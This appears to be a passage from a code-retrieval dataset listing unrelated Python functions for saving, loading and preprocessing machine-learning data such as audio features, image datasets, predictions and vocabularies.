filename", "def save_predictions(gtfilename, loss_type, probs, preds, outfile):\n\n # 1. get file ids\n liste_fileids = []\n targets = []\n passFirstLine=True\n with open(gtfilename, 'r') as fh:\n for line in fh:\n if passFirstLine:\n passFirstLine = False\n continue\n tmp = line.rstrip().split(',')\n liste_fileids.append(tmp[0])\n targets.append(tmp[1])\n\n print 'liste_fileids', len(liste_fileids)\n # 2. save preds\n import csv\n with open(outfile, 'w') as csvfile:\n # fieldnames = ['itemid', 'hasbird', 'pred', 'gt']\n fieldnames = ['itemid', 'hasbird']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n if loss_type == 'categorical_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i, 1], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i, 1]})\n elif loss_type == 'binary_hinge' or loss_type == 'binary_crossentropy' or loss_type == 'weighted_binary_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i][0], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i][0]})\n\n print \"INFO: predictions (positive class probas) saved to file:\", outfile", "def create_song_feats(path):\n features = read_process_song(path, debug=True)\n df = pd.DataFrame(features)\n df.to_csv('./Features/single_song_features/song_features.csv', index=False)", "def save(self, dirname=None):\n self.genio.save(dirname)\n logging.info(\n f'Saved word vectorizations for {dirname}')", "def generate_detections(encoder, mot_dir, output_dir, detection_dir=None):\n if detection_dir is None:\n detection_dir = mot_dir\n try:\n os.makedirs(output_dir)\n except OSError as exception:\n if exception.errno == errno.EEXIST and os.path.isdir(output_dir):\n pass\n else:\n raise ValueError(\n \"Failed to created output directory '%s'\" % output_dir)\n\n for sequence in os.listdir(mot_dir):\n print(\"Processing %s\" % sequence)\n sequence_dir = os.path.join(mot_dir, sequence)\n\n # image_dir = os.path.join(sequence_dir, \"img1\")\n image_dir = sequence_dir\n image_filenames = {\n int(f[6:10]): os.path.join(image_dir, f) \n for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir, f))}\n\n detection_file = os.path.join(\n detection_dir, sequence, \"det/det.txt\")\n detections_in = np.loadtxt(detection_file, delimiter=' ')\n detections_out = []\n\n frame_indices = detections_in[:, 0].astype(np.int)\n min_frame_idx = frame_indices.astype(np.int).min()\n max_frame_idx = frame_indices.astype(np.int).max()\n for frame_idx in range(min_frame_idx, max_frame_idx + 1):\n print(\"Frame %05d/%05d\" % (frame_idx, max_frame_idx))\n mask = frame_indices == frame_idx\n rows = detections_in[mask]\n\n if frame_idx not in image_filenames:\n print(\"WARNING could not find image for frame %d\" % frame_idx)\n continue\n bgr_image = cv2.imread(\n image_filenames[frame_idx], cv2.IMREAD_COLOR)\n features = encoder(bgr_image, rows[:, 2:6].copy())\n detections_out += [np.r_[(row, feature)] for row, feature\n in zip(rows, features)]\n\n output_filename = os.path.join(output_dir, \"%s.npy\" % sequence)\n np.save(\n output_filename, np.asarray(detections_out), allow_pickle=False)", "def features_from_folder(label_folder, audio_folder, output_folder):\n print('Listing label files from folder.')\n #scan labels folder\n labels_list = os.listdir(label_folder)\n label_files = []\n for filename in labels_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'txt':\n continue\n #save to without its extension\n label_files.append(filename[:-4])\n\n print('Listing audio files from folder.')\n #scan audio folder\n audios_list = os.listdir(audio_folder)\n audio_files = []\n for filename in audios_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'wav':\n continue\n #save to without its extension\n audio_files.append(filename[:-4])\n\n print('Removing files without matches')\n #use only the files with matching audio/label\n files_to_process = []\n for label_file in label_files:\n if label_file in audio_files:\n files_to_process.append(label_file)\n\n print('Processing each file...')\n i = 1\n class_count = {}\n total_f = len(files_to_process)\n #for each file\n for processing in files_to_process:\n print('File', str(i) + '/' + str(total_f))\n i += 1\n\n #\n label_file = os.path.join(label_folder, processing + \".txt\")\n audio_file = os.path.join(audio_folder, processing + \".wav\")\n\n #get the segments from the corresponding label file\n segments = get_segments(label_file)\n\n #\n total_s = len(segments)\n j = 1\n #for each segment\n for segment in segments:\n print('\\tSegment', str(j) + '/' + str(total_s), segment['class'])\n j += 1\n\n if class_count.get(segment['class']) is None:\n class_count[segment['class']] = 1\n else:\n class_count[segment['class']] += 1\n output_filename = segment['class']\n output_filename += '-' + format(class_count[segment['class']], '04d')\n output_filename = os.path.join(output_folder, output_filename)\n\n #get its features\n segment_features = features_from_label(audio_file, segment)\n\n #save it to a file\n fe.write_as_bin(output_filename, segment_features)", "def retrieve_saved_data():\n \n sequences = np.load('sequences.npy')\n test_sequences = np.load('test_sequences.npy')\n labels = np.load('labels.npy')\n \n iw = []\n with open('index_word.json', 'r') as f:\n for l in f:\n iw.append(json.loads(l))\n\n index_word = iw[0]\n index_word = {int(key): word for key, word in index_word.items()}\n\n wi = []\n with open('word_index.json', 'r') as f:\n for l in f:\n wi.append(json.loads(l))\n\n word_index = wi[0]\n word_index = {word: int(index) for word, index in word_index.items()}\n \n vs = len(word_index) + 1\n \n return sequences, labels, test_sequences, word_index, index_word, vs", "def save_predictions(self, preds_all, save_dir, scale_pred=False):\n for idx, fname in enumerate(self.test_files):\n fh = open(fname, 'rb')\n img = pil.open(fh)\n orig_h, orig_w = self.gt_depths[idx].shape\n pred_resize = cv2.resize(preds_all[idx], (orig_w, orig_h), interpolation=cv2.INTER_LINEAR)\n if scale_pred:\n scaled_disp, _ = self.scale_depth_disp(pred_resize)\n disp_img = self.generate_disparity_img(scaled_disp)\n else:\n disp_img = self.generate_disparity_img(1./pred_resize)\n\n imgname = \"{0:04d}\".format(idx)\n name_img = os.path.join(save_dir, imgname+\".jpeg\")\n img.save(name_img)\n name_disp = os.path.join(save_dir, imgname+\"_disp.jpeg\")\n disp_img.save(name_disp)", "def save(self, filename):\n target = open(filename, 'w')\n target.write(\"\\\\data\\\\\\n\")\n target.write(\"ngram 1=\" + str(len(self.f1)) + \"\\n\\n\")\n target.write(\"\\\\1-grams:\\n\")\n for w,p in sorted(self.f1.items()): \n target.write(str(p) + \" \" + w + \"\\n\")\n target.write(\"\\\\end\\\\\\n\")\n target.close()", "def batch(dir_path: str):\n for file_name in os.listdir(dir_path):\n clf_str = get_clf_from_file_name(file_name)\n if clf_str:\n print('start get keywords text rank of file {}'.format(file_name))\n file_path = os.path.join(dir_path, file_name)\n docs_json = json.dumps(get_json(file_path))\n # note that the docs json pass to pandas.read_json() function must be type of json string,\n # never pass a json obj to it!\n clf_data = pd.read_json(docs_json, encoding='utf-8')\n yield (clf_str, get_keywords_text_rank(clf_data, 10))", "def generate_variant_dataset(self, variant):\n # process and save as torch files\n print('Generating...')\n\n if not os.path.exists(self.variant_folder):\n os.makedirs(self.variant_folder)\n\n def _rot(image_data):\n \"\"\"Destructive rotation.\"\"\"\n for i in range(image_data.shape[0]):\n rand_deg = np.random.random() * 360.0\n image_data[i] = rotate(image_data[i], rand_deg, reshape=False)\n\n def _bg_rand(image_data):\n \"\"\"Destructive random background.\"\"\"\n noise = np.random.randint(\n 0, 256, image_data.shape, dtype=image_data.dtype)\n image_data[image_data == 0] = noise[image_data == 0]\n\n for data_file in (self.training_file, self.test_file):\n # load original MNIST data\n data, targets = torch.load(os.path.join(self.processed_folder, data_file))\n\n modified_data = data.numpy() # shape: (n, 28, 28)\n if variant == 'rot':\n _rot(modified_data)\n elif variant == 'bg_rand':\n _bg_rand(modified_data)\n elif variant == 'bg_rand_rot':\n _rot(modified_data)\n _bg_rand(modified_data)\n\n with open(os.path.join(self.variant_folder, data_file), 'wb') as f:\n torch.save((torch.from_numpy(modified_data), targets), f)\n\n print('Done!')\n print('Saved dataset to %s.' % self.variant_folder)", "def save(self, directory):\n\n if not os.path.exists(directory):\n os.mkdir(directory)\n\n self._vocab.to_disk(os.path.join(directory, \"spacy_vocab\"))\n\n torch.save(self._model, os.path.join(directory, \"torch_model\"))", "def get_variants(cls, gen, folder):\n filename = 'temp_output{}.txt'.format(gen)\n\n with open(os.path.join(folder, filename), encoding='utf_8_sig', mode='r') as f:\n lines = f.readlines()\n\n for line in lines:\n if line.startswith('Phonemes'):\n line = line.strip()\n phonemes = line.split(':')[-1].split(',')\n if line.startswith('Allophones'):\n allophones = dict()\n line = line.strip()\n line = line.split(':')[-1]\n if not line:\n pass #no variation this turn\n else:\n line = line.split(',')\n for pair in line:\n ur,sr = pair.split('~')\n allophones[sr] = ur\n\n return phonemes,allophones", "def getTmdbGenres():\n\n #If the file is not present in the resource, creates it \n if not isfile(GENRES_FILE):\n saveTmdbGenres()\n\n return np.load(GENRES_FILE)[0]", "def preprocess_dataset(dataset_path, SAMPLES_TO_CONSIDER: int, num_mfcc = 13, n_fft = 2048, hop_length = 512):\r\n\r\n data = {\r\n 'mapping': [],\r\n 'labels': [],\r\n 'MFCCs': [],\r\n 'files': []\r\n }\r\n\r\n # loop through all sub-dirs\r\n total_samples = 0\r\n valid_samples = 0\r\n for i, (dirpath, dirname, filenames) in tqdm(enumerate(os.walk(dataset_path))):\r\n\r\n # ensure we're at sub-folder level\r\n if dirpath is not dataset_path:\r\n # save label (i.e., sub-folder name) in the mapping\r\n label = dirpath.partition('speech_commands_subset')[-1][1:]\r\n\r\n data['mapping'].append(label)\r\n print(\"\\nProcessing: '{}'\".format(label))\r\n print(\"number of files for each class: \", len(filenames))\r\n # process all audio files\r\n for f in filenames:\r\n total_samples += 1\r\n file_path = os.path.join(dirpath, f)\r\n\r\n # load audio file and slice it to ensure length consistency among different files\r\n signal, sample_rate = librosa.load(file_path)\r\n # print(signal.shape)\r\n # print(type(signal[0]))\r\n\r\n # drop audio files with less than pre-decided number of samples\r\n if len(signal) >= SAMPLES_TO_CONSIDER:\r\n valid_samples += 1\r\n # ensure consistency of the length of the signal\r\n signal = signal[:SAMPLES_TO_CONSIDER]\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc = num_mfcc, n_fft = n_fft, \r\n hop_length = hop_length) \r\n # print(MFCCs.shape)\r\n # print(type(MFCCs[0,0]))\r\n\r\n # store data for analysed track\r\n data['MFCCs'].append(MFCCs.T.tolist())\r\n data['labels'].append(i-1)\r\n # data['files'].append(file_path)\r\n # print(\"{}: {}\".format(file_path, i-1))\r\n\r\n # if valid_samples == 20:\r\n # valid_samples =0\r\n # break\r\n print(\"\\ntotal samples: \", total_samples)\r\n print(\"\\nvalid_samples: \", valid_samples)\r\n\r\n \r\n return data", "def dir_resolution(self, src_path, frag_length=128):\n src_path = os.path.join(self.root_path, src_path)\n files = os.listdir(src_path)\n\n MFCCs = None\n labels = None\n cnt = 1\n total_num = len(files)\n for wav in files:\n wav_path = os.path.join(src_path, wav)\n MFCCs_each, labels_each = self.features_and_labels(wav_path, frag_length)\n if MFCCs is not None:\n MFCCs = torch.cat((MFCCs, MFCCs_each))\n labels = torch.cat((labels, labels_each))\n else:\n MFCCs, labels = MFCCs_each, labels_each\n\n if cnt % 1000 == 0:\n print('{} data pieces have been loaded in and {} are left'.format(cnt, total_num-cnt))\n cnt += 1\n\n np.save(self.feature_file, MFCCs.numpy()) \n np.save(self.label_file, labels.numpy())\n print('Loading into files finished!')", "def write_files(data_dir, prefix, data):\n qf = open(os.path.join(data_dir, '%s.queries.txt'%prefix), 'w')\n gf = open(os.path.join(data_dir, '%s.gold.txt'%prefix), 'w')\n\n for q, g in data:\n qf.write(q)\n gf.write(g)\n\n qf.close()\n gf.close()", "def all_wav_to_mp3(self):\n for each_file, artist in self.past_songs_db_data:\n self.convert_wav_to_mp3(each_file)", "def main(dir_models='/Volumes/ext_ssd/jlab/data_imi_10games/saved_models', dir_out='best_models'):\n random.seed(1234)\n\n subdirs = [f for f in os.listdir(dir_models) if os.path.isdir(os.path.join(dir_models, f))]\n\n path_best_models = []\n for subdir in subdirs:\n trial_num = str(random.randint(0,49))\n\n PATH_SUB = os.path.join(dir_models, subdir, trial_num)\n PATH_BEST = os.path.join(PATH_SUB, 'ckpts/best.h5')\n\n # print(PATH_BEST, os.path.join(dir_out, subdir + '_best.h5'))\n shutil.copyfile(PATH_BEST, os.path.join(dir_out, subdir + '_best.h5'))", "def generate_vocab():\n\n vocab_dict = {}\n folder_path = os.listdir(args.f)\n for subfolder in folder_path:\n subfolder_path = os.path.join(args.f, subfolder)\n for filename in os.listdir(subfolder_path):\n with open(os.path.join(subfolder_path, filename), 'r') as file:\n read_file = file.read()\n normalised_text = re.sub(r\"[^\\s\\w]\", \" \", read_file.lower())\n vocab = normalised_text.split() #.split() creates a list of strings\n vocab_dict.update({i: 0 for i in vocab})\n return vocab_dict", "def process_docs(directory, vocab):\n for file_name in listdir(directory):\n file_path = directory + '/' + file_name\n add_doc_to_vocab(file_path, vocab)", "def save_results(PATH, data, filename):\n with open(PATH + '/' + filename + \".txt\",\"w\") as file:\n file.write(\"Results of heuristic models with mean and standard deviation.\\n\")\n for result in data:\n write_result(file, result)\n file.close()\n print('results saved in:'+ PATH + '/' + filename + \".txt\")", "def save2file(self):\n ids_input = []\n labels_input = []\n ids_path = os.path.join(self.path, 'ids')\n if not os.path.exists(ids_path):\n os.makedirs(ids_path)\n labels_path = os.path.join(self.path, 'labels')\n if not os.path.exists(labels_path):\n os.makedirs(labels_path)\n ids_total = len(self.test)\n for i in range(ids_total):\n ids_input = self.test[i][0]\n labels_input = self.test[i][1]\n file_name = \"ids/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(ids_input, dtype=np.int32).tofile(file_path)\n file_name = \"labels/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(labels_input, dtype=np.int32).tofile(file_path)\n print(\"\\n ****** Success! ******\\n \")", "def save_wavetables(self, path: str, filename_prefix: str = '') -> None:\n for i in range(len(self.wavetables)):\n if not os.path.exists(path):\n os.mkdir(path)\n location = os.path.join(path, filename_prefix + f'{i:02d}.wav')\n wav_file = WavFile(location)\n wav_file.write_samples(self.wavetables[i])", "def import_data(hdfile, didx=0, dpath=BASE_PATH, PASS=False, dname='LMD'):\n dset = Dataset(hdfile)\n \n genres = {}\n for f in collect_mat_files(dpath,dname, didx):\n data = loadmat(f)\n g = data['genre'][0]\n print f\n if not g in genres:\n genres[g] = len(genres)\n \n if not PASS:\n x = data['features'].T\n dset.add_data(X=[x],y=[genres[g]],\n metadata=[{'filename':os.path.split(f)[-1]}])\n \n return genres", "def read_dir():\n file_list=[]\n title_list = []\n for filename in os.listdir(\"alignments/\"):\n if filename.endswith(\".aln\"): #Retrieve only alignment files.\n file_list.append(filename)\n with open (\"genID.txt\",'r') as x: #The genID.txt file contains relevant gene names.\n while True:\n rule = x.readline()\n if len(rule) > 0: #If the rule is empty, the program does not use it.\n if rule[0] == \"B\": #Only fetch gen names.\n title_list.append(rule) #The title_list is used to create the variant files in a later stadium\n else:\n break\n return file_list,title_list", "def gen_data_dir(img_dir, id_label_dict, num_class, shuffle=True):\n img_file_path = gen_img_files(img_dir, shuffle)\n return gen_data_file(img_file_path, id_label_dict, num_class)", "def samples(self):\n return glob.glob(os.path.join(self.production.rundir, \"extrinsic_posterior_samples.dat\"))", "def save_vocabulary(self, save_directory: str, filename_prefix: str = None):\n return self.tokenizer.save_vocabulary(save_directory=save_directory, filename_prefix=filename_prefix)", "def classical_search(data, primary, genre):\n __counter = 0 # count total number of songs get\n __browser = chrome_driver_setup()\n\n # read data file, extract list of artists\n artists = txt_to_list(data, delimiter=',')\n\n # for each artist, find artist id and then output list of album names\n __index = 0\n make_directory(\"results/{}\".format(primary))\n filecount = 0\n while filecount <= len(artists)//10:\n print(\"========== Starting for batch {} - {} ==========\".format(filecount*10,(filecount+1)*10))\n for artist in artists[filecount*10:(filecount+1)*10]:\n print(\" NOW FOR ARTIST: {} \".format(artist))\n aid = get_artist_id(artist)\n if aid is None:\n print(\"Cannot find artist {} in Spotify.\".format(artist))\n continue\n album_ids = get_artist_albums_classical(aid)\n for album in album_ids:\n tracks = get_album_tracks(album, 'name')\n if tracks is None:\n print(\"Artist {} has no album found in Spotify.\".format(artist))\n continue\n for track in tracks:\n if track is None or track == \"\":\n print(\"Empty track, skip...\")\n continue\n print(\"Current track: {}\".format(track))\n sleep(randint(3, 5))\n __index += 1\n link, score, title, duration = get_song_for_classical(track, __browser, genre)\n if link == \"skipped\":\n print(\"Duplicate, skip...\")\n continue\n csv_writer_append(\"results/{}/{}_{}.csv\".format(primary, genre, filecount+1),\n __index,\n track,\n title,\n link,\n score,\n duration)\n print(\"{} -- CSV done: {} {} {} {}\".format(__index, title, link, score, duration))\n print(\"\")\n print(\"||||||||||| Finished for batch {} - {} |||||||||||\".format(filecount*10,(filecount+1)*10))\n filecount += 1", "def save_encodings(output_dir, questions, candidates):\n def write_output(output_dir, prefix, objects):\n encodings = np.array([x.encoding for x in objects])\n ids = [x.uid for x in objects]\n with open(os.path.join(output_dir,\n \"{}_encodings.npz\".format(prefix)), \"wb\") as f:\n np.save(f, encodings)\n with open(os.path.join(output_dir,\n \"{}_uids.txt\".format(prefix)), \"w\") as f:\n for id_ in ids:\n f.write(id_ + \"\\n\")\n\n write_output(output_dir, \"question\", questions)\n write_output(output_dir, \"candidate\", candidates)", "def set_fname_encoder(self):\n\n fp = open(self.meta_path, 'r')\n wav_names = []\n next(fp)\n for i, line in tqdm(enumerate(fp)):\n audio_name, _, _, _ = line.split()\n wav_name = os.path.basename(audio_name)\n wav_names.append(wav_name)\n self.fname_encoder.fit(wav_names)", "def save_protein_pickles_and_reset_protein(self):\n self.gene_protein_pickles = {}\n for g in tqdm(self.genes):\n if g.protein.representative_sequence:\n initproteinpickle = op.join(g.protein.protein_dir, '{}_protein.pckl'.format(g.id))\n g.protein.save_pickle(initproteinpickle)\n self.gene_protein_pickles[g.id] = initproteinpickle\n g.reset_protein()\n else:\n g.reset_protein()", "def download_genotype_data():\n print(\"downloading genotype data\")\n download_from_url(PSAM_PATH, dst=f\"{GENOTYPE_DATA_PATH}/{MERGED_GENOTYPE_FILE}.psam\", desc=\"downloading psam\")\n download_from_url(PVAR_PATH, dst=f\"{GENOTYPE_DATA_PATH}/{MERGED_GENOTYPE_FILE}.pvar.zst\",\n desc=\"downloading pvar\")\n download_from_url(PGEN_PATH, dst=f\"{GENOTYPE_DATA_PATH}/{MERGED_GENOTYPE_FILE}.pgen.zst\",\n desc=\"downloading pgen\")\n decompress_genotype_file(f\"{MERGED_GENOTYPE_FILE}.pvar\")\n decompress_genotype_file(f\"{MERGED_GENOTYPE_FILE}.pgen\")", "def save_best_predictions(paths, metric):\n dir_res = '../results/'\n dir_predictions = '../results_best/predictions/'\n dir_dest = dir_predictions+metric+'/'\n\n if not os.path.exists(dir_predictions):\n os.mkdir(dir_predictions)\n\n if not os.path.exists(dir_dest):\n os.mkdir(dir_dest)\n\n for path in paths:\n dataset = path.split('/')[0].strip()\n modelo = path.split('/')[-2].strip()\n nombre = dataset + '_' + modelo + '.npy'\n\n if not os.path.exists(dir_dest + dataset):\n os.mkdir(dir_dest + dataset)\n\n shutil.copyfile(dir_res + path, dir_dest + '/' + dataset + '/' + nombre)", "def mainPSM(myPath, result_file):\n def maxQuant(my_file):\n\n peptideList = list()\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[0].upper().rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptideList.append(peptide)\n\n return peptideList\n\n def proteomeDiscoverer(my_file):\n\n peptideList = list()\n table = str.maketrans('', '', string.ascii_lowercase)\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[4].split(\".\")[1].rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptide = peptide.translate(table)\n peptideList.append(peptide)\n\n return peptideList\n\n def galaxyP(my_file):\n\n peptideList = list()\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[2].upper().rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptideList.append(peptide)\n\n return peptideList\n\n def MPA(my_file):\n\n peptideList = list()\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[2].upper().rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptideList.append(peptide)\n\n return peptideList\n\n # Open a file\n sample_db = os.listdir(myPath)\n # dictionary for a db1-5\n completeResultsDict = dict() # key = se; value = dict(key = dataset, value = peptidelist)\n\n # This would print all the files and directories\n for se in sample_db:\n if se not in completeResultsDict.keys():\n # sub-dictionary for a certain search pipeline\n searchEngineDict = dict() # key = dataset, value = peptidelist)\n completeResultsDict[se] = searchEngineDict\n\n for result in os.listdir(myPath + \"/\" + se):\n peptideList = list()\n if se == \"MQ\":\n peptideList = maxQuant(myPath + \"/\" + se + \"/\" + result)\n elif se == \"PD\":\n peptideList = proteomeDiscoverer(myPath + \"/\" + se + \"/\" + result)\n elif se == \"GP\":\n if result.endswith(\".tabular\"):\n peptideList = galaxyP(myPath + \"/\" + se + \"/\" + result)\n elif se == \"MPA\":\n peptideList = MPA(myPath + \"/\" + se + \"/\" + result)\n else:\n print(\"Are you sure?\")\n\n # updating the completeResultsDict\n if peptideList:\n myDict = completeResultsDict.get(se)\n myDict[result.split(\".\", maxsplit=1)[0]] = peptideList\n\n # nested for-loop: {search engine: {dataset : peptidelist}}\n nonRedundantPeptideSet = set()\n count = 0\n for se, result in completeResultsDict.items():\n for dataset, peptides in result.items():\n for peptide in peptides:\n nonRedundantPeptideSet.add(peptide)\n count += 1\n nonRedundantPeptideList = sorted(list(nonRedundantPeptideSet))\n\n peptideMatrix = dict()\n peptideMatrix[\"PeptideSeq\"] = nonRedundantPeptideList\n headerList = list()\n headerList.append(\"se_dataset\")\n for se, result in completeResultsDict.items():\n print(se)\n for dataset, peptides in result.items():\n print(dataset)\n headerList.append(\"{}_{}\".format(se, dataset))\n peptideList = []\n for peptide in nonRedundantPeptideList:\n if peptide in peptides:\n peptideList.append(1)\n else:\n peptideList.append(0)\n peptideMatrix[\"{}_{}\".format(se, dataset)] = peptideList\n\n\n df = pandas.DataFrame(data=peptideMatrix)\n df.to_csv(open(result_file, \"w\", newline=''), index=False)", "def per_sample_dot_files(self):\n # The output directory #\n directory = DirectoryPath(self.a.out_dir+'per_sample_ontology/')\n directory.create_if_not_exists()\n # Main loop #\n for i, sample in self.df_sample_concepts.iteritems():\n # File path #\n sanitized_name = \"\".join([c for c in sample.name if re.match(r'\\w', c)])\n dot_path = directory + sanitized_name +'.dot'\n pdf_path = directory + sanitized_name +'.pdf'\n # Counts #\n counts = sample / sample.sum()\n counts = dict(counts)\n envos = counts.keys()\n # Skip sample if it has no counts #\n if sample.sum() == 0: continue\n # Make graph #\n graph = self.a.ontology.get_subgraph(envos)\n graph = self.a.ontology.add_weights(graph, counts)\n graph = self.a.ontology.add_style(graph)\n # Write output #\n self.a.ontology.write_to_dot(graph, dot_path)\n self.a.ontology.add_legend(dot_path)\n self.a.ontology.draw_to_pdf(dot_path, pdf_path)", "def _generate_examples(self, data_dir_path):\n for file_name in tf.io.gfile.listdir(data_dir_path):\n if file_name.endswith(\".png\"):\n image = os.path.join(data_dir_path, file_name)\n angle_label = file_name.split(\"_\")[2].split(\".\")[0]\n object_id = file_name.split(\"_\")[0]\n yield file_name, {\n \"image\": image,\n \"angle_label\": angle_label,\n \"object_id\": object_id,\n \"angle\": int(angle_label),\n }", "def process_docs(directory, vocab):\n for filename in listdir(directory):\n if not filename.endswith('.txt'):\n continue\n path = directory + '/' + filename\n add_doc_to_vocab(path, vocab)", "def score_all_genes(self):\n scores = pd.DataFrame(self.clf.predict_proba(self.dataset), index=self.dataset.index)[1]\n scores = pd.DataFrame(scores).sort_values(1, ascending=False)\n scores['known'] = [int(g in list(self.M.befree_genes + self.M.curated_genes + self.M.sven_genes)) for g in scores.index]\n scores.columns = ['score', 'known']\n scores.to_csv(self.save_path + '/all_gene_scores.csv')\n\n predictions = pd.DataFrame(self.clf.predict(self.dataset), index=self.dataset.index)\n predictions['known'] = [int(g in list(self.M.befree_genes + self.M.curated_genes + self.M.sven_genes)) for g in predictions.index]\n predictions.to_csv(self.save_path + '/predictions.csv')", "def prepare_voicebank(\r\n data_folder, save_folder, valid_speaker_count=2, skip_prep=False\r\n):\r\n\r\n if skip_prep:\r\n return\r\n\r\n # Setting ouput files\r\n save_json_train = os.path.join(save_folder, TRAIN_JSON)\r\n save_json_valid = os.path.join(save_folder, VALID_JSON)\r\n save_json_test = os.path.join(save_folder, TEST_JSON)\r\n\r\n # Check if this phase is already done (if so, skip it)\r\n if skip(save_json_train, save_json_test, save_json_valid):\r\n logger.info(\"Preparation completed in previous run, skipping.\")\r\n return\r\n\r\n train_clean_folder = os.path.join(\r\n data_folder, \"clean_trainset_28spk_wav_16k\"\r\n )\r\n train_noisy_folder = os.path.join(\r\n data_folder, \"noisy_trainset_28spk_wav_16k\"\r\n )\r\n train_txts = os.path.join(data_folder, \"trainset_28spk_txt\")\r\n test_clean_folder = os.path.join(data_folder, \"clean_testset_wav_16k\")\r\n test_noisy_folder = os.path.join(data_folder, \"noisy_testset_wav_16k\")\r\n test_txts = os.path.join(data_folder, \"testset_txt\")\r\n\r\n # Setting the save folder\r\n if not os.path.exists(save_folder):\r\n os.makedirs(save_folder)\r\n\r\n # Additional checks to make sure the data folder contains Voicebank\r\n check_voicebank_folders(\r\n train_clean_folder,\r\n train_noisy_folder,\r\n train_txts,\r\n test_clean_folder,\r\n test_noisy_folder,\r\n test_txts,\r\n )\r\n\r\n logger.debug(\"Creating lexicon...\")\r\n lexicon = create_lexicon(os.path.join(data_folder, \"lexicon.txt\"))\r\n logger.info(\"Creating json files for noisy VoiceBank...\")\r\n\r\n logger.debug(\"Collecting files...\")\r\n extension = [\".wav\"]\r\n valid_speakers = TRAIN_SPEAKERS[:valid_speaker_count]\r\n wav_lst_train = get_all_files(\r\n train_noisy_folder, match_and=extension, exclude_or=valid_speakers,\r\n )\r\n wav_lst_valid = get_all_files(\r\n train_noisy_folder, match_and=extension, match_or=valid_speakers,\r\n )\r\n wav_lst_test = get_all_files(test_noisy_folder, match_and=extension)\r\n\r\n logger.debug(\"Creating json files for noisy VoiceBank...\")\r\n create_json(\r\n wav_lst_train, save_json_train, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_valid, save_json_valid, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_test, save_json_test, test_clean_folder, test_txts, lexicon\r\n )", "def _download(self, path):\n self.logger.info('Getting Million Song Dataset...')\n self.logger.info('Downloading Echo Nest Taste Subprofile train data...')\n base_url = 'http://millionsongdataset.com/sites/default/files/challenge/'\n\n download_dataset(\n base_url + 'train_triplets.txt.zip',\n join(self.data_folder, 'train.zip')\n )\n rename(join(self.data_folder, 'train'), path)\n\n self.logger.info('Downloading evaluation data for MSD Challenge...')\n download_dataset(\n base_url + 'EvalDataYear1MSDWebsite.zip',\n join(path, 'eval.zip')\n )\n rename(\n join(path, 'EvalDataYear1MSDWebsite'),\n join(path, 'evaluation')\n )\n\n self.logger.info('Downloading list of matching errors...')\n url = 'http://millionsongdataset.com/sites/default/files/tasteprofile/sid_mismatches.txt'\n download_url(url, join(path, 'sid_mismatches.txt'))", "def export_data(self):\n folder = os.path.dirname(self.filename[0])\n filename_ext = os.path.basename(self.filename[0])\n filename = os.path.splitext(filename_ext)[0] #get filename without extension\n\n path = folder + \"/\" + filename + \"_fit_results.txt\"\n if not os.path.exists(path):\n file = open(path, \"w+\")\n else:\n file = open(path, \"a+\")\n\n for i in range(len(self.data_list)):\n file.write(self.data_list[i] + \"\\n\\n\")\n\n self.data_list = []\n file.close()", "def create_melspectrogram_dataset(label_folder='electronic_music/Trance_label/Train/', save_folder='song_mel_label_data',\n sr=44100, n_mels=128, n_fft=2048, hop_length=512, song_duration=180.0,\n create_data=False):\n if create_data:\n # get list of all labels\n os.makedirs(save_folder, exist_ok=True)\n labels = [path for path in os.listdir(label_folder) if os.path.isdir(label_folder + path)]\n\n # iterate through all lables, songs and find mel spectrogram\n for label in labels:\n print('{} \\n'.format(label))\n label_path = os.path.join(label_folder, label)\n label_songs = os.listdir(label_path)\n\n for song in label_songs:\n print(song)\n song_path = os.path.join(label_path, song)\n\n # Create mel spectrogram for song_duration in the middle of the song and convert it to the log scale\n audio = MP3(song_path)\n audio_lenght = int(audio.info.length)\n audio_middle = (audio_lenght - int(song_duration))/2\n y, sr = librosa.load(song_path, sr=sr, offset=audio_middle, duration=song_duration)\n S = librosa.feature.melspectrogram(y, sr=sr, n_mels=n_mels, n_fft=n_fft, hop_length=hop_length)\n log_S = librosa.logamplitude(S, ref_power=1.0)\n data = (label, log_S, song)\n\n # Save each song\n save_name = label + '_%%-%%_' + song\n with open(os.path.join(save_folder, save_name), 'wb') as fp:\n dill.dump(data, fp)", "def save_separated_audio(self, audios, filename):\n\n # Create folder with mixture name\n folder_path = os.path.join(self.config[\"separated_audio_folder\"], os.path.splitext(filename)[0])\n os.makedirs(folder_path)\n # Save each separated source\n for class_idx, audio in enumerate(audios):\n librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',\n audio.T,\n sr=self.data_set.config[\"sampling_rate\"])\n # Also copy the mixture in the folder\n copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, \"original_mix.wav\"))", "def save_data_to_disk(self):\n Omega_M = self.theta_fid[0]\n for key in self.data.keys():\n np.save(f'./preloaded_data/{Omega_M}_{self.delta_theta[0]}_{key}.npy', self.data[key])", "def 